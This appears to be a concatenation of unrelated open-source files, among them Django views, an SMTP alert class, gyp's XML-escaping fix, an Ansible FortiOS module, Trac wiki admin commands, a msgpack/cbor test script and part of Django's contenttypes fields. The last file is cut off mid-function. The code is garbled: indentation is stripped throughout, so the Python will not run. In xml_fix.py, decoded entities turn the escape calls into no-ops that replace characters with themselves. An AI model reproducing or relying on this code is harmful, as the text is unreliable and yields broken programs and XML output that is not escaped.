from website.app import init_app
from website.models import Node
logger = logging.getLogger('root')
def get_nodes():
forked = Q('__backrefs.forked.node.forked_from', 'ne', None)
registered = Q('__backrefs.registrations.node.registered_from', 'ne', None)
templated = Q('__backrefs.template_node.node.template_node', 'ne', None)
duplicate = (forked | registered | templated)
return Node.find(
duplicate and Q('date_created', 'lt', datetime.datetime(2014, 10, 31))
)
def main():
init_app('website.settings', set_backends=True, routes=False)
if 'dry' in sys.argv:
if 'list' in sys.argv:
logger.info('=== Nodes ===')
for node in get_nodes():
logger.info(node._id)
else:
logger.info('{} Nodes to be updated'.format(get_nodes().count()))
else:
# Log to a file
scripts_utils.add_file_logger(logger, __file__)
nodes = get_nodes()
logger.info('=== Updating {} Nodes ==='.format(nodes.count()))
for node in nodes:
# Wait a second between requests to reduce load on Piwik
time.sleep(1)
logger.info('Calling _update_node_objecton Node {}'.format(node._id))
_update_node_object(node)
logger.info('Finished')
if __name__ == "__main__":
main()
| apache-2.0 |
simonz05/django-notice | notice/views.py | 1 | 1542 | try:
import uwsgi
except ImportError:
pass
# raise ImportError('uWSGI is required to run this package')
from django.contrib.auth.decorators import login_required, user_passes_test
from django.http import HttpResponse
from django.template import RequestContext
from django.utils.functional import Promise
from django.views.decorators.http import condition
from simplejson import JSONEncoder
from backend import get_notices, add_notice
class LazyEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, Promise):
return force_unicode(obj)
return obj
@user_passes_test(lambda u: u.is_superuser)
def add(request):
if request.method != 'POST':
return HttpResponse(content="", status=401)
notice = request.POST['notice']
try:
pk = request.POST['user']
user = User.objects.get(pk)
except KeyError:
user = request.user
add_notice(user, notice)
return HttpResponse(
JSONEncoder().encode({'valid': True}),
mimetype='application/json')
@login_required
@condition(etag_func=None)
def get(request):
data = notice_listener(request.user, {})
resp = HttpResponse(data, mimetype='application/json')
resp['Transfer-Encoding'] = 'chunked'
return resp
def notice_listener(user, context, interval=1):
while True:
notices = get_notices(user)
if notices:
yield JSONEncoder().encode({'notices': notices})
raise StopIteration()
yield ''
uwsgi.green_pause(1)
| bsd-3-clause |
dirkx/AccesSystem | lib-python/AlertEmail.py | 1 | 2771 | #!/usr/bin/env python3.4
#
import sys
import uuid
import smtplib
import time
import logging
from email.mime.text import MIMEText
from ACNode import ACNode
class AlertEmail(ACNode):
default_smtphost = 'localhost'
default_smtpport = 25
default_alertsubject = "[Node alert]"
default_alertfrom = 'acnode@unknown'
# Firstly - we have an 'offline' mode that allows for
# testing without the hardware (i.e. on any laptop or
# machine with python); without the need for the stepper
# motor, mosfet or RFID reader.
#
def parseArguments(self):
self.parser.add('--smtphost', action='store', default= self.default_smtphost,
help='SMTP host (default is '+self.default_smtphost+').')
self.parser.add('--smtpuser', action='store',
help='SMTP username (default is none)')
self.parser.add('--smtppasswd', action='store',
help='SMTP password (default is none)')
self.parser.add('--smtpport', action='store', default=self.default_smtpport,
help='SMTP host (default is '+str(self.default_smtpport)+').')
self.parser.add('--alertsubject', action='store', default=self.default_alertsubject,
help='Subject prefix alert emails (default is '+self.default_alertsubject+').')
self.parser.add('--alertfrom', action='store', default=self.default_alertfrom,
help='Sender of alert emails (default is '+self.default_alertfrom+').')
self.parser.add('--alertto', action='append',
help='Sender of alert emails (default is none). May be used multiple times.')
super().parseArguments()
def send_email(self,mailmsg,mailsubject, dst = None):
if not self.cnf.alertto:
self.logger.debug("No alert email sent - not configured.")
return
to = self.cnf.alertto
if dst:
to = dst
COMMASPACE = ', '
s = smtplib.SMTP(self.cnf.smtphost, self.cnf.smtpport)
if self.cnf.smtpuser and self.cnf.smtppasswd:
s.login(self.cnf.smtpuser, self.cnf.smtppasswd)
# s.sendmail(self.cnf.alertfrom, self.cnf.alertto, msg.as_string())
for st in to:
msg = MIMEText(mailmsg)
msg['Subject'] = self.cnf.alertsubject + ' ' + mailsubject
msg['From'] = 'ACNode ' + self.cnf.node + ' <' + self.cnf.alertfrom + '>'
msg['Message-ID'] = "{}-{}".format(str(uuid.uuid1()), self.cnf.alertfrom)
msg['To'] = st
s.send_message(msg)
s.quit()
if __name__ == "__main__":
acnode = AlertEmails()
if not acnode:
sys.exit(1)
acnode.parseArguments()
acnode.setup()
if not acnode.cnf.alertto:
print("You did not specify an email destination. aborting test.")
sys.exit(1)
acnode.send_email("This is a test.", "test")
| apache-2.0 |
sss-freshbyte/blog | node_modules/node-gyp/gyp/pylib/gyp/xml_fix.py | 2767 | 2174 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Applies a fix to CR LF TAB handling in xml.dom.
Fixes this: http://code.google.com/p/chromium/issues/detail?id=76293
Working around this: http://bugs.python.org/issue5752
TODO(bradnelson): Consider dropping this when we drop XP support.
"""
import xml.dom.minidom
def _Replacement_write_data(writer, data, is_attrib=False):
"""Writes datachars to writer."""
data = data.replace("&", "&").replace("<", "<")
data = data.replace("\"", """).replace(">", ">")
if is_attrib:
data = data.replace(
"\r", "
").replace(
"\n", "
").replace(
"\t", "	")
writer.write(data)
def _Replacement_writexml(self, writer, indent="", addindent="", newl=""):
# indent = current indentation
# addindent = indentation to add to higher levels
# newl = newline string
writer.write(indent+"<" + self.tagName)
attrs = self._get_attributes()
a_names = attrs.keys()
a_names.sort()
for a_name in a_names:
writer.write(" %s=\"" % a_name)
_Replacement_write_data(writer, attrs[a_name].value, is_attrib=True)
writer.write("\"")
if self.childNodes:
writer.write(">%s" % newl)
for node in self.childNodes:
node.writexml(writer, indent + addindent, addindent, newl)
writer.write("%s</%s>%s" % (indent, self.tagName, newl))
else:
writer.write("/>%s" % newl)
class XmlFix(object):
"""Object to manage temporary patching of xml.dom.minidom."""
def __init__(self):
# Preserve current xml.dom.minidom functions.
self.write_data = xml.dom.minidom._write_data
self.writexml = xml.dom.minidom.Element.writexml
# Inject replacement versions of a function and a method.
xml.dom.minidom._write_data = _Replacement_write_data
xml.dom.minidom.Element.writexml = _Replacement_writexml
def Cleanup(self):
if self.write_data:
xml.dom.minidom._write_data = self.write_data
xml.dom.minidom.Element.writexml = self.writexml
self.write_data = None
def __del__(self):
self.Cleanup()
| mit |
ChrisAntaki/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/newstringio.py | 132 | 1757 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""'with'-compliant StringIO implementation."""
import StringIO as OldStringIO
class StringIO(OldStringIO.StringIO):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
| bsd-3-clause |
aperigault/ansible | lib/ansible/modules/network/fortios/fortios_wireless_controller_utm_profile.py | 19 | 10162 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_wireless_controller_utm_profile
short_description: Configure UTM (Unified Threat Management) profile in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by allowing the
user to set and modify wireless_controller feature and utm_profile category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip address.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: true
wireless_controller_utm_profile:
description:
- Configure UTM (Unified Threat Management) profile.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
antivirus-profile:
description:
- AntiVirus profile name. Source antivirus.profile.name.
application-list:
description:
- Application control list name. Source application.list.name.
comment:
description:
- Comment.
ips-sensor:
description:
- IPS sensor name. Source ips.sensor.name.
name:
description:
- UTM profile name.
required: true
scan-botnet-connections:
description:
- Block or monitor connections to Botnet servers or disable Botnet scanning.
choices:
- disable
- block
- monitor
utm-log:
description:
- Enable/disable UTM logging.
choices:
- enable
- disable
webfilter-profile:
description:
- WebFilter profile name. Source webfilter.profile.name.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure UTM (Unified Threat Management) profile.
fortios_wireless_controller_utm_profile:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
wireless_controller_utm_profile:
state: "present"
antivirus-profile: "<your_own_value> (source antivirus.profile.name)"
application-list: "<your_own_value> (source application.list.name)"
comment: "Comment."
ips-sensor: "<your_own_value> (source ips.sensor.name)"
name: "default_name_7"
scan-botnet-connections: "disable"
utm-log: "enable"
webfilter-profile: "<your_own_value> (source webfilter.profile.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_wireless_controller_utm_profile_data(json):
option_list = ['antivirus-profile', 'application-list', 'comment',
'ips-sensor', 'name', 'scan-botnet-connections',
'utm-log', 'webfilter-profile']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def flatten_multilists_attributes(data):
multilist_attrs = []
for attr in multilist_attrs:
try:
path = "data['" + "']['".join(elem for elem in attr) + "']"
current_val = eval(path)
flattened_val = ' '.join(elem for elem in current_val)
exec(path + '= flattened_val')
except BaseException:
pass
return data
def wireless_controller_utm_profile(data, fos):
vdom = data['vdom']
wireless_controller_utm_profile_data = data['wireless_controller_utm_profile']
flattened_data = flatten_multilists_attributes(wireless_controller_utm_profile_data)
filtered_data = filter_wireless_controller_utm_profile_data(flattened_data)
if wireless_controller_utm_profile_data['state'] == "present":
return fos.set('wireless-controller',
'utm-profile',
data=filtered_data,
vdom=vdom)
elif wireless_controller_utm_profile_data['state'] == "absent":
return fos.delete('wireless-controller',
'utm-profile',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_wireless_controller(data, fos):
login(data, fos)
if data['wireless_controller_utm_profile']:
resp = wireless_controller_utm_profile(data, fos)
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"wireless_controller_utm_profile": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"antivirus-profile": {"required": False, "type": "str"},
"application-list": {"required": False, "type": "str"},
"comment": {"required": False, "type": "str"},
"ips-sensor": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"scan-botnet-connections": {"required": False, "type": "str",
"choices": ["disable", "block", "monitor"]},
"utm-log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"webfilter-profile": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
is_error, has_changed, result = fortios_wireless_controller(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 |
rbaumg/trac | trac/wiki/admin.py | 1 | 12181 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
import os.path
import pkg_resources
import sys
from trac.admin import *
from trac.api import IEnvironmentSetupParticipant
from trac.core import *
from trac.wiki import model
from trac.wiki.api import WikiSystem, validate_page_name
from trac.util import read_file
from trac.util.datefmt import datetime_now, format_datetime, from_utimestamp, \
to_utimestamp, utc
from trac.util.text import path_to_unicode, print_table, printout, \
to_unicode, unicode_quote, unicode_unquote
from trac.util.translation import _
class WikiAdmin(Component):
"""trac-admin command provider for wiki administration."""
implements(IAdminCommandProvider, IEnvironmentSetupParticipant)
# IAdminCommandProvider methods
def get_admin_commands(self):
yield ('wiki list', '',
'List wiki pages',
None, self._do_list)
yield ('wiki rename', '<page> <new_name>',
'Rename wiki page',
self._complete_page, self._do_rename)
yield ('wiki remove', '<page>',
'Remove wiki page',
self._complete_page, self._do_remove)
yield ('wiki export', '<page> [file]',
'Export wiki page to file or stdout',
self._complete_import_export, self._do_export)
yield ('wiki import', '<page> [file]',
'Import wiki page from file or stdin',
self._complete_import_export, self._do_import)
yield ('wiki dump', '<directory> [page] [...]',
"""Export wiki pages to files named by title
Individual wiki page names can be specified after the directory.
A name ending with a * means that all wiki pages starting with
that prefix should be dumped. If no name is specified, all wiki
pages are dumped.""",
self._complete_dump, self._do_dump)
yield ('wiki load', '<path> [...]',
"""Import wiki pages from files
If a given path is a file, it is imported as a page with the
name of the file. If a path is a directory, all files in that
directory are imported.""",
self._complete_load_replace, self._do_load)
yield ('wiki replace', '<path> [...]',
"""Replace content of wiki pages from files (DANGEROUS!)
This command replaces the content of the last version of one
or more wiki pages with new content. The previous content is
lost, and no new entry is created in the page history. The
metadata of the page (time, author) is not changed either.
If a given path is a file, it is imported as a page with the
name of the file. If a path is a directory, all files in that
directory are imported.
WARNING: This operation results in the loss of the previous
content and cannot be undone. It may be advisable to backup
the current content using "wiki dump" beforehand.""",
self._complete_load_replace, self._do_replace)
yield ('wiki upgrade', '',
'Upgrade default wiki pages to current version',
None, self._do_upgrade)
def get_wiki_list(self):
return list(WikiSystem(self.env).get_pages())
def export_page(self, page, filename):
for text, in self.env.db_query("""
SELECT text FROM wiki WHERE name=%s
ORDER BY version DESC LIMIT 1
""", (page,)):
if not filename:
printout(text)
else:
if os.path.isfile(filename):
raise AdminCommandError(_("File '%(name)s' exists",
name=path_to_unicode(filename)))
with open(filename, 'w') as f:
f.write(text.encode('utf-8'))
break
else:
raise AdminCommandError(_("Page '%(page)s' not found", page=page))
def import_page(self, filename, title, create_only=[],
replace=False):
if not validate_page_name(title):
raise AdminCommandError(_("Invalid Wiki page name '%(name)s'",
name=title))
if filename:
if not os.path.isfile(filename):
raise AdminCommandError(_("'%(name)s' is not a file",
name=path_to_unicode(filename)))
data = read_file(filename)
else:
data = sys.stdin.read()
data = to_unicode(data, 'utf-8')
with self.env.db_transaction as db:
# Make sure we don't insert the exact same page twice
old = db("""SELECT text FROM wiki WHERE name=%s
ORDER BY version DESC LIMIT 1
""", (title,))
if old and title in create_only:
printout(_(" %(title)s already exists", title=title))
return False
if old and data == old[0][0]:
printout(_(" %(title)s is already up to date", title=title))
return False
if replace and old:
db("""UPDATE wiki SET text=%s
WHERE name=%s
AND version=(SELECT max(version) FROM wiki
WHERE name=%s)
""", (data, title, title))
else:
db("""INSERT INTO wiki (version, readonly, name, time, author,
text)
SELECT 1 + COALESCE(max(version), 0),
COALESCE(max(readonly), 0),
%s, %s, 'trac', %s FROM wiki
WHERE name=%s AND version=(SELECT max(version)
FROM wiki WHERE name=%s)
""", (title, to_utimestamp(datetime_now(utc)), data,
title, title))
if not old:
del WikiSystem(self.env).pages
return True
def load_pages(self, dir, ignore=[], create_only=[], replace=False):
with self.env.db_transaction:
for page in os.listdir(dir):
if page in ignore:
continue
filename = os.path.join(dir, page)
page = unicode_unquote(page.encode('utf-8'))
if os.path.isfile(filename):
if self.import_page(filename, page, create_only, replace):
self.log.info("%s imported from %s",
page, path_to_unicode(filename))
def _complete_page(self, args):
if len(args) == 1:
return self.get_wiki_list()
def _complete_import_export(self, args):
if len(args) == 1:
return self.get_wiki_list()
elif len(args) == 2:
return get_dir_list(args[-1])
def _complete_dump(self, args):
if len(args) == 1:
return get_dir_list(args[-1], dirs_only=True)
elif len(args) >= 2:
return self.get_wiki_list()
def _complete_load_replace(self, args):
if len(args) >= 1:
return get_dir_list(args[-1])
def _do_list(self):
print_table(
[(title, int(edits), format_datetime(from_utimestamp(modified),
console_datetime_format))
for title, edits, modified in self.env.db_query("""
SELECT name, max(version), max(time)
FROM wiki GROUP BY name ORDER BY name""")
], [_("Title"), _("Edits"), _("Modified")])
def _do_rename(self, name, new_name):
if new_name == name:
return
if not new_name:
raise AdminCommandError(_("A new name is mandatory for a rename."))
if not validate_page_name(new_name):
raise AdminCommandError(_("The new name is invalid."))
with self.env.db_transaction:
if model.WikiPage(self.env, new_name).exists:
raise AdminCommandError(_("The page %(name)s already exists.",
name=new_name))
page = model.WikiPage(self.env, name)
page.rename(new_name)
def _do_remove(self, name):
with self.env.db_transaction:
if name.endswith('*'):
pages = list(WikiSystem(self.env).get_pages(name.rstrip('*')
or None))
for p in pages:
page = model.WikiPage(self.env, p)
page.delete()
print_table(((p,) for p in pages), [_('Deleted pages')])
else:
page = model.WikiPage(self.env, name)
page.delete()
def _do_export(self, page, filename=None):
self.export_page(page, filename)
def _do_import(self, page, filename=None):
self.import_page(filename, page)
def _do_dump(self, directory, *names):
if not names:
names = ['*']
pages = self.get_wiki_list()
if not os.path.isdir(directory):
if not os.path.exists(directory):
os.mkdir(directory)
else:
raise AdminCommandError(_("'%(name)s' is not a directory",
name=path_to_unicode(directory)))
for p in pages:
if any(p == name or (name.endswith('*')
and p.startswith(name[:-1]))
for name in names):
dst = os.path.join(directory, unicode_quote(p, ''))
printout(' %s => %s' % (p, dst))
self.export_page(p, dst)
def _load_or_replace(self, paths, replace):
with self.env.db_transaction:
for path in paths:
if os.path.isdir(path):
self.load_pages(path, replace=replace)
else:
page = os.path.basename(path)
page = unicode_unquote(page.encode('utf-8'))
if self.import_page(path, page, replace=replace):
printout(_(" %(page)s imported from %(filename)s",
filename=path_to_unicode(path), page=page))
def _do_load(self, *paths):
self._load_or_replace(paths, replace=False)
def _do_replace(self, *paths):
self._load_or_replace(paths, replace=True)
def _do_upgrade(self):
self.load_pages(pkg_resources.resource_filename('trac.wiki',
'default-pages'),
ignore=['WikiStart', 'SandBox'],
create_only=['InterMapTxt'])
# IEnvironmentSetupParticipant methods
def environment_created(self):
"""Add default wiki pages when environment is created."""
self.log.info("Installing default wiki pages")
pages_dir = pkg_resources.resource_filename('trac.wiki',
'default-pages')
with self.env.db_transaction as db:
self.load_pages(pages_dir)
for page in os.listdir(pages_dir):
if page not in ('InterMapTxt', 'SandBox', 'WikiStart'):
db("UPDATE wiki SET readonly='1' WHERE name=%s", (page,))
def environment_needs_upgrade(self):
pass
def upgrade_environment(self):
pass
| bsd-3-clause |
mdshuai/kubernetes | vendor/github.com/ugorji/go/codec/test.py | 1516 | 4019 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
# get list with all primitive types, and a combo type
l0 = [
-8,
-1616,
-32323232,
-6464646464646464,
192,
1616,
32323232,
6464646464646464,
192,
-3232.0,
-6464646464.0,
3232.0,
6464.0,
6464646464.0,
False,
True,
u"null",
None,
u"someday",
1328176922000002000,
u"",
-2206187877999998000,
u"bytestring",
270,
u"none",
-2013855847999995777,
#-6795364578871345152,
]
l1 = [
{ "true": True,
"false": False },
{ "true": u"True",
"false": False,
"uint16(1616)": 1616 },
{ "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
"int32":32323232, "bool": True,
"LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
"SHORT STRING": u"1234567890" },
{ True: "true", 138: False, "false": 200 }
]
l = []
l.extend(l0)
l.append(l0)
l.append(1)
l.extend(l1)
return l
def build_test_data(destdir):
l = get_test_data_list()
for i in range(len(l)):
# packer = msgpack.Packer()
serialized = msgpack.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb')
f.write(serialized)
f.close()
serialized = cbor.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb')
f.write(serialized)
f.close()
def doRpcServer(port, stopTimeSec):
class EchoHandler(object):
def Echo123(self, msg1, msg2, msg3):
return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
def EchoStruct(self, msg):
return ("%s" % msg)
addr = msgpackrpc.Address('localhost', port)
server = msgpackrpc.Server(EchoHandler())
server.listen(addr)
# run thread to stop it after stopTimeSec seconds if > 0
if stopTimeSec > 0:
def myStopRpcServer():
server.stop()
t = threading.Timer(stopTimeSec, myStopRpcServer)
t.start()
server.start()
def doRpcClientToPythonSvc(port):
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("Echo123", "A1", "B2", "C3")
print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
# print ">>>> port: ", port, " <<<<<"
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
if len(args) == 2 and args[0] == "testdata":
build_test_data(args[1])
elif len(args) == 3 and args[0] == "rpc-server":
doRpcServer(int(args[1]), int(args[2]))
elif len(args) == 2 and args[0] == "rpc-client-python-service":
doRpcClientToPythonSvc(int(args[1]))
elif len(args) == 2 and args[0] == "rpc-client-go-service":
doRpcClientToGoSvc(int(args[1]))
else:
print("Usage: test.py " +
"[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")
if __name__ == "__main__":
doMain(sys.argv[1:])
| apache-2.0 |
divio/django | django/contrib/contenttypes/fields.py | 73 | 22873 | from __future__ import unicode_literals
from collections import defaultdict
from django.contrib.contenttypes.models import ContentType
from django.core import checks
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, connection, models, router, transaction
from django.db.models import DO_NOTHING, signals
from django.db.models.base import ModelBase
from django.db.models.fields.related import (
ForeignObject, ForeignObjectRel, ForeignRelatedObjectsDescriptor,
)
from django.db.models.query_utils import PathInfo
from django.utils.encoding import python_2_unicode_compatible, smart_text
from django.utils.functional import cached_property
@python_2_unicode_compatible
class GenericForeignKey(object):
"""
Provide a generic many-to-one relation through the ``content_type`` and
``object_id`` fields.
This class also doubles as an accessor to the related object (similar to
ReverseSingleRelatedObjectDescriptor) by adding itself as a model
attribute.
"""
# Field flags
auto_created = False
concrete = False
editable = False
hidden = False
is_relation = True
many_to_many = False
many_to_one = True
one_to_many = False
one_to_one = False
related_model = None
remote_field = None
allow_unsaved_instance_assignment = False
def __init__(self, ct_field='content_type', fk_field='object_id', for_concrete_model=True):
self.ct_field = ct_field
self.fk_field = fk_field
self.for_concrete_model = for_concrete_model
self.editable = False
self.rel = None
self.column = None
def contribute_to_class(self, cls, name, **kwargs):
self.name = name
self.model = cls
self.cache_attr = "_%s_cache" % name
cls._meta.add_field(self, virtual=True)
# Only run pre-initialization field assignment on non-abstract models
if not cls._meta.abstract:
signals.pre_init.connect(self.instance_pre_init, sender=cls)
setattr(cls, name, self)
def __str__(self):
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def check(self, **kwargs):
errors = []
errors.extend(self._check_field_name())
errors.extend(self._check_object_id_field())
errors.extend(self._check_content_type_field())
return errors
def _check_field_name(self):
if self.name.endswith("_"):
return [
checks.Error(
'Field names must not end with an underscore.',
hint=None,
obj=self,
id='fields.E001',
)
]
else:
return []
def _check_object_id_field(self):
try:
self.model._meta.get_field(self.fk_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey object ID references the non-existent field '%s'." % self.fk_field,
hint=None,
obj=self,
id='contenttypes.E001',
)
]
else:
return []
def _check_content_type_field(self):
"""
Check if field named `field_name` in model `model` exists and is a
valid content_type field (is a ForeignKey to ContentType).
"""
try:
field = self.model._meta.get_field(self.ct_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey content type references the non-existent field '%s.%s'." % (
self.model._meta.object_name, self.ct_field
),
hint=None,
obj=self,
id='contenttypes.E002',
)
]
else:
if not isinstance(field, models.ForeignKey):
return [
checks.Error(
"'%s.%s' is not a ForeignKey." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E003',
)
]
elif field.remote_field.model != ContentType:
return [
checks.Error(
"'%s.%s' is not a ForeignKey to 'contenttypes.ContentType'." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
"""
Handle initializing an object with the generic FK instead of
content_type and object_id fields.
"""
if self.name in kwargs:
value = kwargs.pop(self.name)
if value is not None:
kwargs[self.ct_field] = self.get_content_type(obj=value)
kwargs[self.fk_field] = value._get_pk_val()
else:
kwargs[self.ct_field] = None
kwargs[self.fk_field] = None
def get_content_type(self, obj=None, id=None, using=None):
if obj is not None:
return ContentType.objects.db_manager(obj._state.db).get_for_model(
obj, for_concrete_model=self.for_concrete_model)
elif id is not None:
return ContentType.objects.db_manager(using).get_for_id(id)
else:
# This should never happen. I love comments like this, don't you?
raise Exception("Impossible arguments to GFK.get_content_type!")
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is not None:
raise ValueError("Custom queryset can't be used for this lookup.")
# For efficiency, group the instances by content type and then do one
# query per model
fk_dict = defaultdict(set)
# We need one instance for each group in order to get the right db:
instance_dict = {}
ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
for instance in instances:
# We avoid looking for values if either ct_id or fkey value is None
ct_id = getattr(instance, ct_attname)
if ct_id is not None:
fk_val = getattr(instance, self.fk_field)
if fk_val is not None:
fk_dict[ct_id].add(fk_val)
instance_dict[ct_id] = instance
ret_val = []
for ct_id, fkeys in fk_dict.items():
instance = instance_dict[ct_id]
ct = self.get_content_type(id=ct_id, using=instance._state.db)
ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
# For doing the join in Python, we have to match both the FK val and the
